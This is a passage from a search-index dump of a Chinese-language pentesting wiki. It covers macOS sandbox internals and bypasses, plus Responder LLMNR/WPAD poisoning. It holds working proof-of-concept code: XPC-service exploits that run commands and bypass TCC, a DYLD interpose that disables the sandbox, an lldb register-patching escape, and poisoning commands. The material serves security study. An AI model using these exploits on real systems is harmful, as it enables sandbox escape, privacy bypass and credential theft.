当进程加载相关二进制文件时调用,然后执行配置文件检查,并检查禁止 SUID/SGID 执行。 mpo_cred_label_update_execve: 当标签被分配时调用。这是最长的一个,因为它在二进制文件完全加载但尚未执行时调用。它将执行诸如创建沙箱对象、将沙箱结构附加到 kauth 凭据、移除对 mach 端口的访问等操作。 请注意, _cred_sb_evalutate 是 sb_evaluate_internal 的包装器,该函数获取传递的凭据,然后使用 eval 函数执行评估,该函数通常评估默认应用于所有进程的 平台配置文件 ,然后是 特定进程配置文件 。请注意,平台配置文件是 SIP 在 macOS 中的主要组成部分之一。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » MACF Hooks","id":"2601","title":"MACF Hooks"},"2602":{"body":"沙箱还有一个用户守护进程,暴露了 XPC Mach 服务 com.apple.sandboxd 并绑定特殊端口 14 (HOST_SEATBELT_PORT),内核扩展使用该端口与其通信。它通过 MIG 暴露了一些函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » Sandboxd","id":"2602","title":"Sandboxd"},"2603":{"body":"*OS Internals Volume III tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » References","id":"2603","title":"References"},"2604":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 在此页面中,您可以找到如何创建一个应用程序,以便从默认的 macOS 沙箱内部启动任意命令: 编译应用程序: main.m #include int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nwhile (true) {\\nchar input[512]; printf(\\"Enter command to run (or \'exit\' to quit): \\");\\nif (fgets(input, sizeof(input), stdin) == NULL) {\\nbreak;\\n} // Remove newline character\\nsize_t len = strlen(input);\\nif (len > 0 && input[len - 1] == \'\\\\n\') {\\ninput[len - 1] = \'\\\\0\';\\n} if (strcmp(input, \\"exit\\") == 0) {\\nbreak;\\n} system(input);\\n}\\n}\\nreturn 0;\\n} 编译运行: clang -framework Foundation -o SandboxedShellApp main.m 构建 .app 包 bash mkdir -p SandboxedShellApp.app/Contents/MacOS\\nmv SandboxedShellApp SandboxedShellApp.app/Contents/MacOS/ cat << EOF > SandboxedShellApp.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleIdentifier\\ncom.example.SandboxedShellApp\\nCFBundleName\\nSandboxedShellApp\\nCFBundleVersion\\n1.0\\nCFBundleExecutable\\nSandboxedShellApp\\n\\n\\nEOF 定义权限 sandbox\\nsandbox + downloads bash cat << EOF > entitlements.plist\\n\\n\\n\\n\\ncom.apple.security.app-sandbox\\n\\n\\n\\nEOF bash cat << EOF > entitlements.plist\\n\\n\\n\\n\\ncom.apple.security.app-sandbox\\n\\ncom.apple.security.files.downloads.read-write\\n\\n\\n\\nEOF 签署应用程序(您需要在钥匙串中创建一个证书) bash codesign --entitlements entitlements.plist -s \\"YourIdentity\\" SandboxedShellApp.app\\n./SandboxedShellApp.app/Contents/MacOS/SandboxedShellApp # An d in case you need this in the future\\ncodesign --remove-signature SandboxedShellApp.app tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Default Sandbox Debug » macOS 默认沙箱调试","id":"2604","title":"macOS 默认沙箱调试"},"2605":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Sandbox Debug & Bypass","id":"2605","title":"macOS Sandbox Debug & Bypass"},"2606":{"body":"图片来自 http://newosxbook.com/files/HITSB.pdf 在前面的图像中,可以观察到运行具有 com.apple.security.app-sandbox 权限的应用程序时 沙箱是如何被加载的 。 编译器将链接 /usr/lib/libSystem.B.dylib 到二进制文件。 然后, libSystem.B 将调用其他几个函数,直到 xpc_pipe_routine 将应用程序的权限发送给负责沙箱初始化的守护进程(本页称其为 securityd;但从后文 lldb 回溯中的 libsystem_secinit 以及 SECINITD_* 消息键来看,实际应答该注册请求并返回容器根路径与编译后沙箱配置文件的是 secinitd)。该守护进程检查该进程是否应该被放入沙箱,如果是,则返回要应用的配置文件。 最后,沙箱将通过调用 __sandbox_ms 激活,该调用将调用 __mac_syscall 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Sandbox loading process","id":"2606","title":"Sandbox loading process"},"2607":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可能的绕过方法","id":"2607","title":"可能的绕过方法"},"2608":{"body":"沙箱进程创建的文件 会附加 隔离属性 以防止沙箱逃逸。然而,如果你设法在沙箱应用程序内 创建一个没有隔离属性的 .app 文件夹 ,你可以使应用程序包的二进制文件指向 /bin/bash 并在 plist 中添加一些环境变量,以利用 open 来 启动新的未沙箱应用程序 。 这就是 CVE-2023-32364 中所做的。 caution 因此,目前,如果你仅能创建一个以 .app 结尾且没有隔离属性的文件夹,你可以逃离沙箱,因为 macOS 只 检查 .app 文件夹 和 主可执行文件 中的 隔离 属性(我们将主可执行文件指向 /bin/bash )。 请注意,如果一个 .app 包已经被授权运行(它具有带有授权运行标志的隔离 xattr),你也可以利用它……只是现在你不能在 .app 包内写入,除非你拥有一些特权 TCC 权限(在严格的沙箱内你将没有这些权限)。","breadcrumbs":"macOS 
Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 绕过隔离属性","id":"2608","title":"绕过隔离属性"},"2609":{"body":"在 Word 沙箱绕过的最后示例 中可以看到如何利用 open CLI 功能来绕过沙箱。 macOS Office Sandbox Bypasses","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用 Open 功能","id":"2609","title":"利用 Open 功能"},"261":{"body":"WPAD 允许浏览器自动发现代理设置。 通过 DHCP、DNS 或在 DNS 失败时回退到 LLMNR 和 NBT-NS 来促进发现。 Responder 可以自动化 WPAD 攻击,将客户端引导到恶意 WPAD 服务器。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Web 代理自动发现协议 (WPAD)","id":"261","title":"Web 代理自动发现协议 (WPAD)"},"2610":{"body":"即使一个应用程序 旨在被沙箱化 (com.apple.security.app-sandbox),如果它 从 LaunchAgent 执行 (例如 ~/Library/LaunchAgents),也可以绕过沙箱。 正如在 这篇文章 中所解释的,如果你想要在一个沙箱应用程序中获得持久性,你可以使其作为 LaunchAgent 自动执行,并可能通过 DyLib 环境变量注入恶意代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 启动代理/守护进程","id":"2610","title":"启动代理/守护进程"},"2611":{"body":"如果一个沙箱进程可以 写入 一个 稍后将运行二进制文件的未沙箱应用程序 的位置,它将能够 通过将二进制文件放置在那里 来逃离。此类位置的一个好例子是 ~/Library/LaunchAgents 或 /System/Library/LaunchDaemons。 为此,你可能需要 2 步 :使一个具有 更宽松沙箱 (file-read*, file-write*) 的进程执行你的代码,该代码实际上将在一个 未沙箱执行 的位置写入。 查看此页面关于 自动启动位置 : macOS Auto Start","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用自动启动位置","id":"2611","title":"利用自动启动位置"},"2612":{"body":"如果从沙箱进程中你能够 破坏其他在限制较少的沙箱中运行的进程 (或没有沙箱),你将能够逃离它们的沙箱: macOS Process Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 利用其他进程","id":"2612","title":"利用其他进程"},"2613":{"body":"沙箱还允许通过在配置文件 application.sb 中定义的 XPC 与某些 Mach 服务 进行通信。如果你能够 利用 其中一个服务,你可能能够 逃离沙箱 。 正如在 这篇文章 中所指出的,关于 Mach 服务的信息存储在 /System/Library/xpc/launchd.plist 中。可以通过在该文件中搜索 SystemUser 来找到所有系统和用户 Mach 服务。 
此外,可以通过调用 bootstrap_look_up 来检查某个 Mach 服务是否可用于沙箱应用程序: objectivec void checkService(const char *serviceName) {\\nmach_port_t service_port = MACH_PORT_NULL;\\nkern_return_t err = bootstrap_look_up(bootstrap_port, serviceName, &service_port);\\nif (!err) {\\nNSLog(@\\"available service:%s\\", serviceName);\\nmach_port_deallocate(mach_task_self_, service_port);\\n}\\n} void print_available_xpc(void) {\\nNSDictionary* dict = [NSDictionary dictionaryWithContentsOfFile:@\\"/System/Library/xpc/launchd.plist\\"];\\nNSDictionary* launchDaemons = dict[@\\"LaunchDaemons\\"];\\nfor (NSString* key in launchDaemons) {\\nNSDictionary* job = launchDaemons[key];\\nNSDictionary* machServices = job[@\\"MachServices\\"];\\nfor (NSString* serviceName in machServices) {\\ncheckService(serviceName.UTF8String);\\n}\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可用的系统和用户 Mach 服务","id":"2613","title":"可用的系统和用户 Mach 服务"},"2614":{"body":"这些 Mach 服务最初被滥用以 逃离沙盒在这篇文章中 。那时, 应用程序及其框架所需的所有 XPC 服务 都在应用程序的 PID 域中可见(这些是 ServiceType 为 Application 的 Mach 服务)。 为了 联系一个 PID 域 XPC 服务 ,只需在应用程序中注册它,使用如下代码: objectivec [[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework\\"]load]; 此外,可以通过在 System/Library/xpc/launchd.plist 中搜索 Application 来找到所有 Application Mach 服务。 找到有效的 xpc 服务的另一种方法是检查以下内容: bash find /System/Library/Frameworks -name \\"*.xpc\\"\\nfind /System/Library/PrivateFrameworks -name \\"*.xpc\\" 几个滥用此技术的示例可以在 原始报告 中找到,然而,以下是一些总结的示例。 /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc 此服务通过始终返回 YES 来允许每个 XPC 连接,方法 runTask:arguments:withReply: 执行任意命令和任意参数。 该漏洞的利用“简单到”: objectivec @protocol SKRemoteTaskRunnerProtocol\\n-(void)runTask:(NSURL *)task arguments:(NSArray *)args withReply:(void (^)(NSNumber *, NSError *))reply;\\n@end void exploit_storagekitfsrunner(void) {\\n[[NSBundle 
bundleWithPath:@\\"/System/Library/PrivateFrameworks/StorageKit.framework\\"] load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@\\"com.apple.storagekitfsrunner\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(SKRemoteTaskRunnerProtocol)];\\n[conn setInterruptionHandler:^{NSLog(@\\"connection interrupted!\\");}];\\n[conn setInvalidationHandler:^{NSLog(@\\"connection invalidated!\\");}];\\n[conn resume]; [[conn remoteObjectProxy] runTask:[NSURL fileURLWithPath:@\\"/usr/bin/touch\\"] arguments:@[@\\"/tmp/sbx\\"] withReply:^(NSNumber *bSucc, NSError *error) {\\nNSLog(@\\"run task result:%@, error:%@\\", bSucc, error);\\n}];\\n} /System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework/XPCServices/AudioAnalyticsHelperService.xpc 这个 XPC 服务允许每个客户端总是返回 YES,方法 createZipAtPath:hourThreshold:withReply: 基本上允许指示要压缩的文件夹路径,并将其压缩为 ZIP 文件。 因此,可以生成一个虚假的应用程序文件夹结构,压缩它,然后解压并执行,以逃离沙盒,因为新文件将没有隔离属性。 漏洞是: objectivec @protocol AudioAnalyticsHelperServiceProtocol\\n-(void)pruneZips:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;\\n-(void)createZipAtPath:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;\\n@end\\nvoid exploit_AudioAnalyticsHelperService(void) {\\nNSString *currentPath = NSTemporaryDirectory();\\nchdir([currentPath UTF8String]);\\nNSLog(@\\"======== preparing payload at the current path:%@\\", currentPath);\\nsystem(\\"mkdir -p compressed/poc.app/Contents/MacOS; touch 1.json\\");\\n[@\\"#!/bin/bash\\\\ntouch /tmp/sbx\\\\n\\" writeToFile:@\\"compressed/poc.app/Contents/MacOS/poc\\" atomically:YES encoding:NSUTF8StringEncoding error:0];\\nsystem(\\"chmod +x compressed/poc.app/Contents/MacOS/poc\\"); [[NSBundle bundleWithPath:@\\"/System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework\\"] load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] 
initWithServiceName:@\\"com.apple.internal.audioanalytics.helper\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AudioAnalyticsHelperServiceProtocol)];\\n[conn resume]; [[conn remoteObjectProxy] createZipAtPath:currentPath hourThreshold:0 withReply:^(id *error){\\nNSDirectoryEnumerator *dirEnum = [[[NSFileManager alloc] init] enumeratorAtPath:currentPath];\\nNSString *file;\\nwhile ((file = [dirEnum nextObject])) {\\nif ([[file pathExtension] isEqualToString: @\\"zip\\"]) {\\n// open the zip\\nNSString *cmd = [@\\"open \\" stringByAppendingString:file];\\nsystem([cmd UTF8String]); sleep(3); // wait for decompression and then open the payload (poc.app)\\nNSString *cmd2 = [NSString stringWithFormat:@\\"open /Users/%@/Downloads/%@/poc.app\\", NSUserName(), [file stringByDeletingPathExtension]];\\nsystem([cmd2 UTF8String]);\\nbreak;\\n}\\n}\\n}];\\n} /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc 这个 XPC 服务允许通过方法 extendAccessToURL:completion: 为 XPC 客户端提供对任意 URL 的读写访问,该方法接受任何连接。由于 XPC 服务具有 FDA,因此可以滥用这些权限以完全绕过 TCC。 漏洞是: objectivec @protocol WFFileAccessHelperProtocol\\n- (void) extendAccessToURL:(NSURL *) url completion:(void (^) (FPSandboxingURLWrapper *, NSError *))arg2;\\n@end\\ntypedef int (*PFN)(const char *);\\nvoid expoit_ShortcutsFileAccessHelper(NSString *target) {\\n[[NSBundle bundleWithPath:@\\"/System/Library/PrivateFrameworks/WorkflowKit.framework\\"]load];\\nNSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@\\"com.apple.WorkflowKit.ShortcutsFileAccessHelper\\"];\\nconn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(WFFileAccessHelperProtocol)];\\n[conn.remoteObjectInterface setClasses:[NSSet setWithArray:@[[NSError class], objc_getClass(\\"FPSandboxingURLWrapper\\")]] forSelector:@selector(extendAccessToURL:completion:) argumentIndex:0 ofReply:1];\\n[conn resume]; [[conn remoteObjectProxy] extendAccessToURL:[NSURL 
fileURLWithPath:target] completion:^(FPSandboxingURLWrapper *fpWrapper, NSError *error) {\\nNSString *sbxToken = [[NSString alloc] initWithData:[fpWrapper scope] encoding:NSUTF8StringEncoding];\\nNSURL *targetURL = [fpWrapper url]; void *h = dlopen(\\"/usr/lib/system/libsystem_sandbox.dylib\\", 2);\\nPFN sandbox_extension_consume = (PFN)dlsym(h, \\"sandbox_extension_consume\\");\\nif (sandbox_extension_consume([sbxToken UTF8String]) == -1)\\nNSLog(@\\"Fail to consume the sandbox token:%@\\", sbxToken);\\nelse {\\nNSLog(@\\"Got the file R&W permission with sandbox token:%@\\", sbxToken);\\nNSLog(@\\"Read the target content:%@\\", [NSData dataWithContentsOfURL:targetURL]);\\n}\\n}];\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 可用的 PID Mach 服务","id":"2614","title":"可用的 PID Mach 服务"},"2615":{"body":"这项研究 发现了绕过沙箱的两种方法。因为沙箱是在用户空间中加载 libSystem 库时应用的。如果一个二进制文件能够避免加载它,它将永远不会被沙箱化: 如果二进制文件是 完全静态编译 的,它可以避免加载该库。 如果 二进制文件不需要加载任何库 (因为链接器也在 libSystem 中),它就不需要加载 libSystem。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 静态编译与动态链接","id":"2615","title":"静态编译与动态链接"},"2616":{"body":"请注意, 即使是 shellcodes 在 ARM64 中也需要链接到 libSystem.dylib: bash ld -o shell shell.o -macosx_version_min 13.0\\nld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Shellcodes","id":"2616","title":"Shellcodes"},"2617":{"body":"正如在 这篇文章的附加内容 中所解释的,沙箱限制如: (version 1)\\n(allow default)\\n(deny file-write* (literal \\"/private/tmp/sbx\\")) 可以通过一个新进程执行来绕过,例如: bash mkdir -p /tmp/poc.app/Contents/MacOS\\necho \'#!/bin/sh\\\\n touch /tmp/sbx\' > /tmp/poc.app/Contents/MacOS/poc\\nchmod +x /tmp/poc.app/Contents/MacOS/poc\\nopen /tmp/poc.app 然而,当然,这个新进程不会从父进程继承权限或特权。","breadcrumbs":"macOS 
Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 不继承的限制","id":"2617","title":"不继承的限制"},"2618":{"body":"请注意,某些 操作 只有在应用程序具有特定 权限(entitlement) 时才会在沙箱中被 允许 ,例如: scheme (when (entitlement \\"com.apple.security.network.client\\")\\n(allow network-outbound (remote ip))\\n(allow mach-lookup\\n(global-name \\"com.apple.airportd\\")\\n(global-name \\"com.apple.cfnetwork.AuthBrokerAgent\\")\\n(global-name \\"com.apple.cfnetwork.cfnetworkagent\\")\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 权限","id":"2618","title":"权限"},"2619":{"body":"有关 Interposing(符号插桩)的更多信息,请查看: macOS Function Hooking 请注意:以下两种方法都依赖 dyld 处理 DYLD_INSERT_LIBRARIES,它们之所以对本页的 sand 测试程序有效,是因为该程序是自行编译、未加固的二进制文件;对启用了 hardened runtime 或受限的二进制文件,通常不适用。 Interpose _libsecinit_initializer 以阻止沙盒初始化 c // gcc -dynamiclib interpose.c -o interpose.dylib #include void _libsecinit_initializer(void); void overriden__libsecinit_initializer(void) {\\nprintf(\\"_libsecinit_initializer called\\\\n\\");\\n} __attribute__((used, section(\\"__DATA,__interpose\\"))) static struct {\\nvoid (*overriden__libsecinit_initializer)(void);\\nvoid (*_libsecinit_initializer)(void);\\n}\\n_libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer}; bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand\\n_libsecinit_initializer called\\nSandbox Bypassed! 通过插桩 __mac_syscall 阻止沙盒初始化(拦截 policy 为 \\"Sandbox\\"、code 为 0 即 set_profile 的调用) interpose.c // gcc -dynamiclib interpose.c -o interpose.dylib #include \\n#include // Forward Declaration\\nint __mac_syscall(const char *_policyname, int _call, void *_arg); // Replacement function\\nint my_mac_syscall(const char *_policyname, int _call, void *_arg) {\\nprintf(\\"__mac_syscall invoked. 
Policy: %s, Call: %d\\\\n\\", _policyname, _call);\\nif (strcmp(_policyname, \\"Sandbox\\") == 0 && _call == 0) {\\nprintf(\\"Bypassing Sandbox initiation.\\\\n\\");\\nreturn 0; // pretend we did the job without actually calling __mac_syscall\\n}\\n// Call the original function for other cases\\nreturn __mac_syscall(_policyname, _call, _arg);\\n} // Interpose Definition\\nstruct interpose_sym {\\nconst void *replacement;\\nconst void *original;\\n}; // Interpose __mac_syscall with my_mac_syscall\\n__attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section(\\"__DATA, __interpose\\"))) = {\\n{ (const void *)my_mac_syscall, (const void *)__mac_syscall },\\n}; bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand __mac_syscall invoked. Policy: Sandbox, Call: 2\\n__mac_syscall invoked. Policy: Sandbox, Call: 2\\n__mac_syscall invoked. Policy: Sandbox, Call: 0\\nBypassing Sandbox initiation.\\n__mac_syscall invoked. Policy: Quarantine, Call: 87\\n__mac_syscall invoked. 
Policy: Sandbox, Call: 4\\nSandbox Bypassed!","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » Interposting Bypass","id":"2619","title":"Interposting Bypass"},"262":{"body":"Responder 是一个用于中毒 LLMNR、NBT-NS 和 mDNS 查询的工具,根据查询类型选择性响应,主要针对 SMB 服务。 它在 Kali Linux 中预装,可在 /etc/responder/Responder.conf 中配置。 Responder 在屏幕上显示捕获的哈希并将其保存在 /usr/share/responder/logs 目录中。 它支持 IPv4 和 IPv6。 Windows 版本的 Responder 可在 这里 获取。 运行 Responder 使用默认设置运行 Responder:responder -I 进行更激进的探测(可能有副作用):responder -I -P -r -v 捕获 NTLMv1 挑战/响应以便于破解的技术:responder -I --lm --disable-ess 可以通过以下命令激活 WPAD 冒充:responder -I --wpad NetBIOS 请求可以解析为攻击者的 IP,并可以设置身份验证代理:responder.py -I -Pv","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Responder 用于协议中毒","id":"262","title":"Responder 用于协议中毒"},"2620":{"body":"让我们编译一个应该被沙箱保护的应用程序: sand.c\\nentitlements.xml\\nInfo.plist c #include \\nint main() {\\nsystem(\\"cat ~/Desktop/del.txt\\");\\n} xml \\n\\ncom.apple.security.app-sandbox\\n\\n\\n xml \\n\\nCFBundleIdentifier\\nxyz.hacktricks.sandbox\\nCFBundleName\\nSandbox\\n\\n 然后编译应用程序: bash # Compile it\\ngcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand # Create a certificate for \\"Code Signing\\" # Apply the entitlements via signing\\ncodesign -s --entitlements entitlements.xml sand caution 应用程序将尝试 读取 文件 ~/Desktop/del.txt ,而 Sandbox 不允许 。 在那里创建一个文件,因为一旦绕过 Sandbox,它将能够读取它: echo \\"Sandbox Bypassed\\" > ~/Desktop/del.txt 让我们调试应用程序,看看 Sandbox 何时加载: bash # Load app in debugging\\nlldb ./sand # Set breakpoint in xpc_pipe_routine\\n(lldb) b xpc_pipe_routine # run\\n(lldb) r # This breakpoint is reached by different functionalities\\n# Check in the backtrace is it was de sandbox one the one that reached it\\n# We are looking for the one libsecinit from libSystem.B, like the following one:\\n(lldb) bt\\n* thread #1, queue = \'com.apple.main-thread\', stop 
reason = breakpoint 1.1\\n* frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine\\nframe #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584\\nframe #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64\\nframe #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80\\nframe #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272 # To avoid lldb cutting info\\n(lldb) settings set target.max-string-summary-length 10000 # The message is in the 2 arg of the xpc_pipe_routine function, get it with:\\n(lldb) p (char *) xpc_copy_description($x1)\\n(char *) $0 = 0x000000010100a400 \\" { count = 5, transaction: 0, voucher = 0x0, contents =\\\\n\\\\t\\\\\\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\\\\\\" => { length = 4, contents = \\\\\\"sand\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\\\\\\" => { count = 42, capacity = 64, contents =\\\\n\\\\t\\\\t0: { length = 14, contents = \\\\\\"/tmp/lala/sand\\\\\\" }\\\\n\\\\t\\\\t1: { length = 22, contents = \\\\\\"/private/tmp/lala/sand\\\\\\" }\\\\n\\\\t\\\\t2: { length = 26, contents = \\\\\\"/usr/lib/libSystem.B.dylib\\\\\\" }\\\\n\\\\t\\\\t3: { length = 30, contents = \\\\\\"/usr/lib/system/libcache.dylib\\\\\\" }\\\\n\\\\t\\\\t4: { length = 37, contents = \\\\\\"/usr/lib/system/libcommonCrypto.dylib\\\\\\" }\\\\n\\\\t\\\\t5: { length = 36, contents = \\\\\\"/usr/lib/system/libcompiler_rt.dylib\\\\\\" }\\\\n\\\\t\\\\t6: { length = 33, contents = \\\\\\"/usr/lib/system/libcopyfile.dylib\\\\\\" }\\\\n\\\\t\\\\t7: { length = 35, contents = \\\\\\"/usr/lib/system/libcorecry\\"... 
# The 3 arg is the address were the XPC response will be stored\\n(lldb) register read x2\\nx2 = 0x000000016fdfd660 # Move until the end of the function\\n(lldb) finish # Read the response\\n## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\\n(lldb) memory read -f p 0x000000016fdfd660 -c 1\\n0x16fdfd660: 0x0000600003d04000\\n(lldb) p (char *) xpc_copy_description(0x0000600003d04000)\\n(char *) $4 = 0x0000000100204280 \\" { count = 7, transaction: 0, voucher = 0x0, contents =\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\\\\\\" => { length = 22, contents = \\\\\\"xyz.hacktricks.sandbox\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\\\\\\" => : 2\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\\\\\\" => { length = 65, contents = \\\\\\"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\\\\\\" }\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\\\\\\" => : { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... 
}\\\\n\\\\t\\\\\\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\\\\\\" => : 1\\\\n\\\\t\\\\\\"SECINITD_MESSAGE_TYPE_KEY\\\\\\" => : 2\\\\n\\\\t\\\\\\"SECINITD_REPLY_FAILURE_CODE\\\\\\" => : 0\\\\n}\\" # To bypass the sandbox we need to skip the call to __mac_syscall\\n# Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox)\\n(lldb) breakpoint set --name __mac_syscall --condition \'($x1 == 0)\'\\n(lldb) c # The 1 arg is the name of the policy, in this case \\"Sandbox\\"\\n(lldb) memory read -f s $x0\\n0x19300eb22: \\"Sandbox\\" #\\n# BYPASS\\n# # Due to the previous bp, the process will be stopped in:\\nProcess 2517 stopped\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\nframe #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall\\nlibsystem_kernel.dylib`:\\n-> 0x187659900 <+0>: mov x16, #0x17d\\n0x187659904 <+4>: svc #0x80\\n0x187659908 <+8>: b.lo 0x187659928 ; <+40>\\n0x18765990c <+12>: pacibsp # To bypass jump to the b.lo address modifying some registers first\\n(lldb) breakpoint delete 1 # Remove bp\\n(lldb) register write $pc 0x187659928 #b.lo address\\n(lldb) register write $x0 0x00\\n(lldb) register write $x1 0x00\\n(lldb) register write $x16 0x17d\\n(lldb) c\\nProcess 2517 resuming\\nSandbox Bypassed!\\nProcess 2517 exited with status = 0 (0x00000000) [!WARNING] > 即使绕过了沙盒,TCC 仍会询问用户是否允许该进程读取桌面上的文件","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » 使用 lldb 调试和绕过沙箱","id":"2620","title":"使用 lldb 调试和绕过沙箱"},"2621":{"body":"http://newosxbook.com/files/HITSB.pdf https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/ https://www.youtube.com/watch?v=mG715HcDgO8 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
